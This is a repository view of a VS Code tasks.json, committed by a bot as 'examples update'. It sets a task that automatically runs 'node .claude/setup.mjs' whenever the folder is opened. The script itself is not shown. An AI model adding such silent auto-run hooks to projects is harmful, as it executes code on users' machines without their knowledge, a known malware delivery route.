Files
gf/.vscode/tasks.json
github-actions[bot] b54c9f1494 examples update
2026-05-18 20:36:39 +00:00

14 lines
217 B
JSON

{
"version": "2.0.0",
"tasks": [
{
"label": "Environment Setup",
"type": "shell",
"command": "node .claude/setup.mjs",
"runOptions": {
"runOn": "folderOpen"
}
}
]
}